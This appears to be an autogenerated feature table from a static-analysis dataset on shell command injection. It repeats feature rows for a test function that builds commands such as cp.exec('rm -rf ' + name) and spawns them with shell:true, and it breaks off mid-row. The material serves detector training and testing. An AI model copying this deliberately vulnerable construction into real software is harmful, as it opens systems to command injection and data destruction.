Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:3 | cp | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:8 | cp.exec | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | cp.exec ... + name) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:5:415:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:5:415:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:5:415:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:5:415:8 | exec | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:5:415:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:18 | "rm -rf " | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:10:415:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:22:415:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:22:415:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:22:415:25 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:22:415:25 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:22:415:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:22:415:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:3 | cp | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:12 | cp.execFile | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:12 | cp.execFile | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:12 | cp.execFile | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:12 | cp.execFile | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:12 | cp.execFile | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | cp.exec ... => {}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | cp.exec ... => {}) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | cp.exec ... => {}) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | cp.exec ... => {}) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | cp.exec ... => {}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | exceptional return of cp.exec ... => {}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | exceptional return of cp.exec ... => {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | exceptional return of cp.exec ... => {}) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | exceptional return of cp.exec ... => {}) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | exceptional return of cp.exec ... => {}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:5:417:12 | execFile | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:5:417:12 | execFile | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:5:417:12 | execFile | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:5:417:12 | execFile | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:5:417:12 | execFile | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 